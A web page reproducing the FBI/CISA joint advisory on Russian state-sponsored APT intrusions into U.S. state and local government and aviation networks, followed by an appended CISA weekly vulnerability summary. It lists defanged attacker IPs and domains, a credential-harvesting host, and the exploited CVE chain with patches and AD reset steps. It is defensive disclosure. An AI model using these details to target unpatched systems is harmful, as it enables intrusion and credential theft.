<h3>Technical Details</h3><p>The FBI and CISA have observed Russian state-sponsored APT actor activity targeting U.S. SLTT government networks, as well as aviation networks. The APT actor is using Turkish IP addresses <code>213.74.101[.]65</code>, <code>213.74.139[.]196</code>, and <code>212.252.30[.]170</code> to connect to victim web servers (<em>Exploit Public Facing Application</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1190/”>T1190</a>]).</p>

<p>The actor is using <code>213.74.101[.]65</code> and <code>213.74.139[.]196</code> to attempt brute force logins and, in several instances, attempted Structured Query Language (SQL) injections on victim websites (<em>Brute Force</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1110″>T1110</a>]; <em>Exploit Public Facing Application</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1190/”>T1190</a>]). The APT actor also hosted malicious domains, including possible aviation sector target <code>columbusairports.microsoftonline[.]host</code>, which resolved to <code>108.177.235[.]92</code> and <code>[cityname].westus2.cloudapp.azure.com</code>; these domains are U.S. registered and are likely SLTT government targets (<em>Drive-By Compromise </em>[<a href=”https://attack.mitre.org/versions/v7/techniques/T1189″>T1189</a>]).</p>

<p>The APT actor scanned for vulnerable Citrix and Microsoft Exchange services and identified vulnerable systems, likely for future exploitation. This actor continues to exploit a Citrix Directory Traversal Bug (<a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-19781″>CVE-2019-19781</a>) and a Microsoft Exchange remote code execution flaw (<a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-0688″>CVE-2020-0688</a>).</p>

<p>The APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability (<a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-10149″>CVE 2019-10149</a>) (<em>External Remote Services</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1133″>T1133</a>]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability (<a href=”https://nvd.nist.gov/vuln/detail/CVE-2018-13379″>CVE-2018-13379</a>) for Initial Access [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0001/”>TA0001</a>] and a Windows Netlogon vulnerability (<a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-1472″>CVE-2020-1472</a>) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0004/”>TA0004</a>] within the network (<em>Valid Accounts</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1078″>T1078</a>]). These vulnerabilities can also be leveraged to compromise other devices on the network (<em>Lateral Movement</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0008/”>TA0008</a>]) and to maintain <em>Persistence</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0003/”>TA0003</a>]).</p>

<p>Between early February and mid-September, these APT actors used <code>213.74.101[.]65</code>, <code>212.252.30[.]170</code>, <code>5.196.167[.]184</code>, <code>37.139.7[.]16</code>, <code>149.56.20[.]55</code>, <code>91.227.68[.]97</code>, and <code>5.45.119[.]124</code> to target U.S. SLTT government networks. Successful authentications—including the compromise of Microsoft Office 365 (O365) accounts—have been observed on at least one victim network (<em>Valid Accounts</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1078″>T1078</a>]).</p>
<h3>Mitigations</h3><h4>Indicators of Compromise</h4>

<p>The APT actor used the following IP addresses and domains to carry out its objectives:</p>

<ul>
<li><code>213.74.101[.]65</code></li>
<li><code>213.74.139[.]196</code></li>
<li><code>212.252.30[.]170</code></li>
<li><code>5.196.167[.]184</code></li>
<li><code>37.139.7[.]16</code></li>
<li><code>149.56.20[.]55</code></li>
<li><code>91.227.68[.]97</code></li>
<li><code>138.201.186[.]43</code></li>
<li><code>5.45.119[.]124</code></li>
<li><code>193.37.212[.]43</code></li>
<li><code>146.0.77[.]60</code></li>
<li><code>51.159.28[.]101</code></li>
<li><code>columbusairports.microsoftonline[.]host</code></li>
<li><code>microsoftonline[.]host</code></li>
<li><code>email.microsoftonline[.]services</code></li>
<li><code>microsoftonline[.]services</code></li>
<li><code>cityname[.]westus2.cloudapp.azure.com</code></li>
</ul>

<p>IP address <code>51.159.28[.]101</code> appears to have been configured to receive stolen Windows New Technology Local Area Network Manager (NTLM) credentials. FBI and CISA recommend organizations take defensive actions to mitigate the risk of leaking NTLM credentials; specifically, organizations should disable NTLM or restrict outgoing NTLM. Organizations should consider blocking IP address <code>51.159.28[.]101</code> (although this action alone may not mitigate the threat, as the APT actor has likely established, or will establish, additional infrastructure points).</p>

<p>Organizations should check available logs for traffic to/from IP address <code>51.159.28[.]101</code> for indications of credential-harvesting activity. As the APT actors likely have—or will—establish additional infrastructure points, organizations should also monitor for Server Message Block (SMB) or WebDAV activity leaving the network to other IP addresses.</p>

<p>Refer to <a href=”https://us-cert.cisa.gov/sites/default/files/publications/AA20-296A.stix.xml”>AA20-296A.stix</a> for a downloadable copy of IOCs.</p>

<h4>Network Defense-in-Depth</h4>

<p>Proper network defense-in-depth and adherence to information security best practices can assist in mitigating the threat and reducing the risk to critical infrastructure. The following guidance may assist organizations in developing network defense procedures.</p>

<ul>
<li>Keep all applications updated according to vendor recommendations, and especially prioritize updates for external facing applications and remote access services to address CVE-2019-19781, CVE-2020-0688, CVE 2019-10149, CVE-2018-13379, and CVE-2020-1472. Refer to table 1 for patch information on these CVEs.</li>
</ul>

<p class=”text-align-center”><em>Table 1: Patch information for CVEs</em></p>

<table border=”1″ cellpadding=”1″ cellspacing=”1″ class=”general-table” style=”width: 881.467px; height: 312px; margin-left: auto; margin-right: auto;”>
<thead>
<tr>
<th scope=”col” style=”width: 198px;”><strong>Vulnerability</strong></th>
<th scope=”col” style=”width: 311px;”><strong>Vulnerable Products</strong></th>
<th scope=”col” style=”width: 356px;”><strong>Patch Information</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td scope=”col” style=”text-align: left; width: 198px;”><a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-19781″>CVE-2019-19781</a></td>
<td scope=”col” style=”text-align: left; width: 311px;”>
<ul>
<li>Citrix Application Delivery Controller</li>
<li>Citrix Gateway</li>
<li>Citrix SDWAN WANOP</li>
</ul>

<p> </p>
</td>
<td scope=”col” style=”text-align: left; width: 356px;”>
<p><a href=”https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/”>Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0</a></p>

<p><a href=”https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/”>Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3</a></p>

<p><a href=”https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/”>Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0</a></p>

<p><a href=”https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/”>Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5</a></p>
</td>
</tr>
<tr>
<td scope=”col” style=”text-align: left; width: 198px;”><a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-0688″>CVE-2020-0688</a></td>
<td scope=”col” style=”text-align: left; width: 311px;”>
<ul>
<li>Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30</li>
<li>Microsoft Exchange Server 2013 Cumulative Update 23</li>
<li>Microsoft Exchange Server 2016 Cumulative Update 14</li>
<li>Microsoft Exchange Server 2016 Cumulative Update 15</li>
<li>Microsoft Exchange Server 2019 Cumulative Update 3</li>
<li>Microsoft Exchange Server 2019 Cumulative Update 4</li>
</ul>

<p> </p>
</td>
<td scope=”col” style=”text-align: left; width: 356px;”><a href=”https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688″>Microsoft Security Advisory for CVE-2020-0688</a></td>
</tr>
<tr>
<td scope=”col” style=”text-align: left; width: 198px;”><a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-10149″>CVE-2019-10149</a></td>
<td scope=”col” style=”text-align: left; width: 311px;”>
<ul>
<li>Exim versions 4.87–4.91</li>
</ul>
</td>
<td scope=”col” style=”text-align: left; width: 356px;”><a href=”https://www.exim.org/static/doc/security/CVE-2019-10149.txt”>Exim page for CVE-2019-10149</a></td>
</tr>
<tr>
<td scope=”col” style=”text-align: left; width: 198px;”><a href=”https://nvd.nist.gov/vuln/detail/CVE-2018-13379″>CVE-2018-13379</a></td>
<td scope=”col” style=”text-align: left; width: 311px;”>
<ul>
<li>FortiOS 6.0: 6.0.0 to 6.0.4</li>
<li>FortiOS 5.6: 5.6.3 to 5.6.7</li>
<li>FortiOS 5.4: 5.4.6 to 5.4.12</li>
</ul>
</td>
<td scope=”col” style=”text-align: left; width: 356px;”><a href=”https://www.fortiguard.com/psirt/FG-IR-18-384″>Fortinet Security Advisory: FG-IR-18-384</a></td>
</tr>
<tr>
<td scope=”col” style=”text-align: left; width: 198px;”><a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-1472″>CVE-2020-1472</a></td>
<td scope=”col” style=”text-align: left; width: 311px;”>
<ul>
<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>
<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>
<li>Windows Server 2012</li>
<li>Windows Server 2012 (Server Core installation)</li>
<li>Windows Server 2012 R2</li>
<li>Windows Server 2016</li>
<li>Windows Server 2019</li>
<li>Windows Server 2019 (Server Core installation)</li>
<li>Windows Server, version 1903  (Server Core installation)</li>
<li>Windows Server, version 1909  (Server Core installation)</li>
<li>Windows Server, version 2004   (Server Core installation)</li>
</ul>
</td>
<td scope=”col” style=”text-align: left; width: 356px;”>
<p><a href=”https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472″>Microsoft Security Advisory for CVE-2020-1472</a></p>

<ul>
<li>Follow Microsoft’s <a href=”https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc”>guidance</a> on monitoring logs for activity related to the Netlogon vulnerability, CVE-2020-1472.</li>
<li>If appropriate for your organization’s network, prevent external communication of all versions of SMB and related protocols at the network boundary by blocking Transmission Control Protocol (TCP) ports 139 and 445 and User Datagram Protocol (UDP) port 137. See the CISA publication on <a href=”https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices”>SMB Security Best Practices</a> for more information.</li>
<li>Implement the prevention, detection, and mitigation strategies outlined in:
<ul>
<li>CISA Alert <a href=”https://us-cert.cisa.gov/ncas/alerts/TA15-314A”>TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance</a>.</li>
<li>National Security Agency Cybersecurity Information Sheet <a href=”https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2159419/detect-prevent-cyber-attackers-from-exploiting-web-servers-via-web-shell-malware/”>U/OO/134094-20 – Detect and Prevent Web Shells Malware</a>.</li>
</ul>
</li>
<li>Isolate external facing services in a network demilitarized zone (DMZ) since they are more exposed to malicious activity; enable robust logging, and monitor the logs for signs of compromise.</li>
<li>Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.</li>
<li>Implement application controls to only allow execution from specified application directories. System administrators may implement this through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from <code>PROGRAMFILES</code>, <code>PROGRAMFILES(X86)</code>, and <code>WINDOWS</code> folders. All other locations should be disallowed unless an exception is granted.</li>
<li>Block Remote Desktop Protocol (RDP) connections originating from untrusted external addresses unless an exception exists; routinely review exceptions on a regular basis for validity.</li>
</ul>

<h4>Comprehensive Account Resets</h4>

<p>For accounts where NTLM password hashes or Kerberos tickets may have been compromised (e.g., through CVE-2020-1472), a double-password-reset may be required in order to prevent continued exploitation of those accounts. For domain-admin-level credentials, a reset of KRB-TGT “Golden Tickets” may be required, and Microsoft has released specialized <a href=”https://docs.microsoft.com/en-us/azure-advanced-threat-protection/domain-dominance-alerts”>guidance</a> for this. Such a reset should be performed very carefully if needed.</p>

<p>If there is an observation of <a href=”https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472″>CVE-2020-1472</a> Netlogon activity or other indications of valid credential abuse, it should be assumed the APT actors have compromised AD administrative accounts. In such cases, the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through “creative destruction,” wherein, as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed in on-premise—as well as in Azure-hosted—AD instances.</p>

<p>Note that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.</p>

<p>It is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.</p>

<ol>
<li>Create a temporary administrator account, and use this account only for all administrative actions</li>
<li>Reset the Kerberos Ticket Granting Ticket <code>(krbtgt</code>) password;[<a href=”https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password”>1</a>] this must be completed before any additional actions (a second reset will take place in step 5)</li>
<li>Wait for the <code>krbtgt</code> reset to propagate to all domain controllers (time may vary)</li>
<li> Reset all account passwords (passwords should be 15 characters or more and randomly assigned):
<ol type=”a”>
<li>User accounts (forced reset with no legacy password reuse)</li>
<li>Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])</li>
<li>Service accounts</li>
<li>Directory Services Restore Mode (DSRM) account</li>
<li>Domain Controller machine account</li>
<li>Application passwords</li>
</ol>
</li>
<li>Reset the<code> krbtgt</code> password again</li>
<li>Wait for the <code>krbtgt</code> reset to propagate to all domain controllers (time may vary)</li>
<li>Reboot domain controllers</li>
<li>Reboot all endpoints</li>
</ol>

<p>The following accounts should be reset:</p>

<ul>
<li>AD Kerberos Authentication Master (2x)</li>
<li>All Active Directory Accounts</li>
<li>All Active Directory Admin Accounts</li>
<li>All Active Directory Service Accounts</li>
<li>All Active Directory User Accounts</li>
<li>DSRM Account on Domain Controllers</li>
<li>Non-AD Privileged Application Accounts</li>
<li>Non-AD Unprivileged Application Accounts</li>
<li>Non-Windows Privileged Accounts</li>
<li>Non-Windows User Accounts</li>
<li>Windows Computer Accounts</li>
<li>Windows Local Admin</li>
</ul>

<h4>VPN Vulnerabilities</h4>

<p>Implement the following recommendations to secure your organization’s VPNs:</p>

<ul>
<li><strong>Update VPNs, network infrastructure devices, and devices</strong> being used to remote into work environments with the latest software patches and security configurations. See CISA Tips <a href=”https://us-cert.cisa.gov/ncas/tips/ST04-006″>Understanding Patches and Software Updates</a> and <a href=”https://us-cert.cisa.gov/ncas/tips/ST18-001″>Securing Network Infrastructure Devices</a>. Wherever possible, enable automatic updates.</li>
<li><strong>Implement MFA on all VPN connections to increase security</strong>. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. See CISA Tips <a href=”https://us-cert.cisa.gov/ncas/tips/ST04-002″>Choosing and Protecting Passwords</a> and <a href=”https://us-cert.cisa.gov/ncas/tips/ST05-012″>Supplementing Passwords</a> for more information.</li>
</ul>

<p>Discontinue unused VPN servers. Reduce your organization’s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:</p>

<ul>
<li><strong>Audit </strong>configuration and patch management programs.</li>
<li><strong>Monitor </strong>network traffic for unexpected and unapproved protocols, especially outbound to the Internet (e.g., Secure Shell [SSH], SMB, RDP).</li>
<li><strong>Implement</strong> MFA, especially for privileged accounts.</li>
<li><strong>Use</strong> separate administrative accounts on separate administration workstations.</li>
<li><strong>Keep </strong><a href=”https://us-cert.cisa.gov/ncas/tips/ST04-006″>software up to date</a>. Enable automatic updates, if available.</li>
</ul>
<h3>Contact Information</h3><p>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href=”http://www.fbi.gov/contact-us/field”>www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href=”https://us-cert.cisa.govmailto:CyWatch@fbi.gov”>CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href=”https://us-cert.cisa.govmailto:Central@cisa.dhs.gov”>Central@cisa.dhs.gov</a>.</p>

<h3>Resources</h3>

<ul>
<li>APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations – <a href=”https://us-cert.cisa.gov/ncas/alerts/aa20-283a”>https://us-cert.cisa.gov/ncas/alerts/aa20-283a</a></li>
<li>CISA Activity Alert CVE-2019-19781 – <a href=”https://us-cert/cisa.gov/ncas/alerts/aa20-031a”>https://us-cert/cisa.gov/ncas/alerts/aa20-031a</a></li>
<li>CISA Vulnerability Bulletin – <a href=”https://us-cert/cisa.gov/ncas/bulletins/SB19-161″>https://us-cert/cisa.gov/ncas/bulletins/SB19-161</a></li>
<li>CISA Current Activity – <a href=”https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688″>https://us-cert.cisa.gov/ncas/current-activity/2020/03/10/unpatched-microsoft-exchange-servers-vulnerable-cve-2020-0688</a></li>
<li>Citrix Directory Traversal Bug (CVE-2019-19781) – <a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-19781″>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</a></li>
<li>Microsoft Exchange remote code execution flaw (CVE-2020-0688) – <a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-0688″>https://nvd.nist.gov/vuln/detail/CVE-2020-0688</a></li>
<li>CVE-2018-13379 – <a href=”https://nvd.nist.gov/vuln/detail/CVE-2018-13379 “>https://nvd.nist.gov/vuln/detail/CVE-2018-13379</a></li>
<li>CVE-2020-1472 – <a href=”https://nvd.nist.gov/vuln/detail/CVE-2020-1472″>https://nvd.nist.gov/vuln/detail/CVE-2020-1472</a></li>
<li>CVE 2019-10149 – <a href=”https://nvd.nist.gov/vuln/detail/CVE-2019-10149”>https://nvd.nist.gov/vuln/detail/CVE-2019-10149</a></li>
<li>NCCIC/USCERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance – <a href=”https://us-cert.cisa.gov/ncas/alerts/TA15-314A “>https://us-cert.cisa.gov/ncas/alerts/TA15-314A</a></li>
<li>NCCIC/US-CERT publication on SMB Security Best Practices – <a href=”https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices”>https://us-cert.cisa.gov/ncas/current-activity/2017/01/16/SMB-Security-Best-Practices</a><br />
 </li>
</ul>

<div class=”special_container text-align-center”><strong><em>DISCLAIMER</em></strong></div>

<p><o:p></o:p></p>
<h3>References</h3>
<ul> <li><a href=”https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password”>[1] Microsoft: AD Forest Recovery – Resetting the krbtgt password</a></li> </ul> <h3>Revisions</h3>
<ul> <li>October 22, 2020: Initial Version</li> <li>November 17, 2020: Added U.S. Heat Map of Activity</li> </ul>
<hr />
<div class=”field field–name-body field–type-text-with-summary field–label-hidden field–item”><p class=”privacy-and-terms”>This product is provided subject to this <a href=”https://us-cert.cisa.gov/privacy/notification”>Notification</a> and this <a href=”https://www.dhs.gov/privacy-policy”>Privacy & Use</a> policy.</p>

</div>

alerts

Vulnerability Summary for the Week of October 12, 2020

Post author By admin
Post date October 19, 2020

Original release date: October 19, 2020

High Vulnerabilities

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
foxitsoftware — foxit_reader	This vulnerability allows local attackers to escalate privileges on affected installations of Foxit PhantomPDF 10.0.0.35798. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of the configuration files used by the Foxit PhantomPDF Update Service. The issue results from incorrect permissions set on a resource used by the service. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of SYSTEM. Was ZDI-CAN-11308.	2020-10-13	7.2	CVE-2020-17415 N/A N/A
foxitsoftware — foxit_reader	This vulnerability allows local attackers to escalate privileges on affected installations of Foxit Reader 10.0.0.35798. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the handling of the configuration files used by the Foxit Reader Update Service. The issue results from incorrect permissions set on a resource used by the service. An attacker can leverage this vulnerability to escalate privileges and execute code in the context of SYSTEM. Was ZDI-CAN-11229.	2020-10-13	7.2	CVE-2020-17414 N/A N/A
google — android	In multiple settings screens, there are possible tapjacking attacks due to an insecure default value. This could lead to local escalation of privilege and permissions with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.0 Android-8.1Android ID: A-155288585	2020-10-14	9.3	CVE-2020-0416 MISC
google — android	In gatt_process_read_by_type_rsp of gatt_cl.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure in the Bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-158833854	2020-10-14	7.8	CVE-2020-0377 MISC
google — android	In setUpdatableDriverPath of GpuService.cpp, there is a possible memory corruption due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11Android ID: A-162383705	2020-10-14	7.2	CVE-2020-0420 MISC
google — android	In appendFormatV of String8.cpp, there is a possible out of bounds write due to incorrect error handling. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-161894517	2020-10-14	7.2	CVE-2020-0421 MISC
google — android	There is a possible out of bounds write due to a missing bounds check.Product: AndroidVersions: Android SoCAndroid ID: A-163008257	2020-10-14	9.4	CVE-2020-0283 MISC
google — android	There is a possible out of bounds read due to a missing bounds check.Product: AndroidVersions: Android SoCAndroid ID: A-163003156	2020-10-14	9.4	CVE-2020-0376 MISC
google — android	There is a possible out of bounds read due to a missing bounds check.Product: AndroidVersions: Android SoCAndroid ID: A-163008256	2020-10-14	9.4	CVE-2020-0371 MISC
google — android	There is a possible out of bounds write due to a missing bounds check.Product: AndroidVersions: Android SoCAndroid ID: A-162980455	2020-10-14	9.4	CVE-2020-0367 MISC
google — android	There is a possible out of bounds read due to a missing bounds check.Product: AndroidVersions: Android SoCAndroid ID: A-162980705	2020-10-14	9.4	CVE-2020-0339 MISC
google — android	In remove of String16.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-156999009	2020-10-14	7.2	CVE-2020-0408 MISC
huawei — p30_pro_firmware	HUAWEI P30 Pro versions earlier than 10.1.0.160(C00E160R2P8) have an out-of-bounds read and write vulnerability. An unauthenticated attacker crafts malformed message with specific parameter and sends the message to the affected products. Due to insufficient validation of message, which may be exploited to cause the process reboot.	2020-10-12	7.1	CVE-2020-9108 MISC
huawei — p30_pro_firmware	HUAWEI P30 Pro versions earlier than 10.1.0.160(C00E160R2P8) have an out-of-bounds read and write vulnerability. An unauthenticated attacker crafts malformed message with specific parameter and sends the message to the affected products. Due to insufficient validation of message, which may be exploited to cause the process reboot.	2020-10-12	7.1	CVE-2020-9107 MISC
ibm — cognos_analytics	IBM Cognos Analytics 11.0 and 11.1 could allow a remote attacker to execute arbitrary code on the system, caused by a CSV injection. By persuading a victim to open a specially-crafted excel file, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 176610.	2020-10-12	9.3	CVE-2020-4302 XF CONFIRM
ibm — security_guardium	IBM Security Guardium 11.2 is vulnerable to CVS Injection. A remote privileged attacker could execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-ForceID: 186696.	2020-10-12	8.5	CVE-2020-4689 XF CONFIRM
lenovo — diagnostics	A DLL search path vulnerability was reported in Lenovo Diagnostics prior to version 4.35.4 that could allow a user with local access to execute code on the system.	2020-10-14	7.2	CVE-2020-8338 MISC
netgear — d6200_firmware	Certain NETGEAR devices are affected by authentication bypass. This affects D6200 before 1.1.00.36, D7000 before 1.0.1.74, PR2000 before 1.0.0.30, R6020 before 1.0.0.42, R6050 before 1.0.1.22, JR6150 before 1.0.1.22, R6080 before 1.0.0.42, R6120 before 1.0.0.66, R6220 before 1.1.0.100, R6230 before 1.1.0.100, R6260 before 1.1.0.64, R6700v2 before 1.2.0.62, R6800 before 1.2.0.62, R69002 before 1.2.0.62, and WNR2020 before 1.1.0.62.	2020-10-09	10	CVE-2020-26908 MISC
netgear — d7800_firmware	Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects D7800 before 1.0.1.58 and R7500v2 before 1.0.3.48.	2020-10-09	8.3	CVE-2020-26909 MISC
netgear — rbk752_firmware	Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects RBK752 before 3.2.15.25, RBR750 before 3.2.15.25, RBS750 before 3.2.15.25, RBK852 before 3.2.15.25, RBR850 before 3.2.15.25, and RBS850 before 3.2.15.25.	2020-10-09	8.3	CVE-2020-26902 MISC
netgear — rbk852_firmware	Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects RBK852 before 3.2.16.6, RBR850 before 3.2.16.6, and RBS850 before 3.2.16.6.	2020-10-09	7.7	CVE-2020-26907 MISC

Medium Vulnerabilities

Primary Vendor — Product	Description	Published	CVSS Score	Source & Patch Info
apache — fineract	The implementation of POST with the username and password in the URL parameters exposed the credentials. More infomration is available in fineract jira issues 726 and 629.	2020-10-13	5	CVE-2018-20243 MISC
foxitsoftware — 3d	This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 10.0.0.35798. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects embedded in PDF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11226.	2020-10-13	6.8	CVE-2020-17413 N/A N/A
foxitsoftware — 3d	This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 10.0.0.35798. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects embedded in PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11224.	2020-10-13	6.8	CVE-2020-17412 N/A N/A
foxitsoftware — 3d	This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PhantomPDF 10.0.0.35798. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of U3D objects embedded in PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-11190.	2020-10-13	4.3	CVE-2020-17411 N/A N/A
foxitsoftware — foxit_reader	This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PhantomPDF 10.0.0.35798. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of GIF files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11135.	2020-10-13	6.8	CVE-2020-17410 N/A N/A
garfield_petshop_project — garfield_petshop	A cross-site request forgery (CSRF) vulnerability in mod/user/act_user.php in Garfield Petshop through 2020-10-01 allows remote attackers to hijack the authentication of administrators for requests that create new administrative accounts.	2020-10-09	6.8	CVE-2020-26522 MISC MISC MISC MISC
google — android	In getCarrierPrivilegeStatus of UiccAccessRule.java, there is a missing permission check. This could lead to local information disclosure of EID data with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-159062405	2020-10-14	4.9	CVE-2020-0246 MISC
google — android	In ~AACExtractor() of AACExtractor.cpp, there is a possible out of bounds write due to uninitialized data. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-142641801	2020-10-14	4.3	CVE-2020-0411 MISC
google — android	In gatt_process_read_by_type_rsp of gatt_cl.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure in the Bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11 Android-8.0Android ID: A-158778659	2020-10-14	5	CVE-2020-0413 MISC
google — android	In showDataRoamingNotification of NotificationMgr.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-153356561	2020-10-14	4.9	CVE-2020-0400 MISC
google — android	In onWnmFrameReceived of PasspointManager.java, there is a missing permission check. This could lead to local information disclosure of location data with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-157748906	2020-10-14	4.9	CVE-2020-0378 MISC
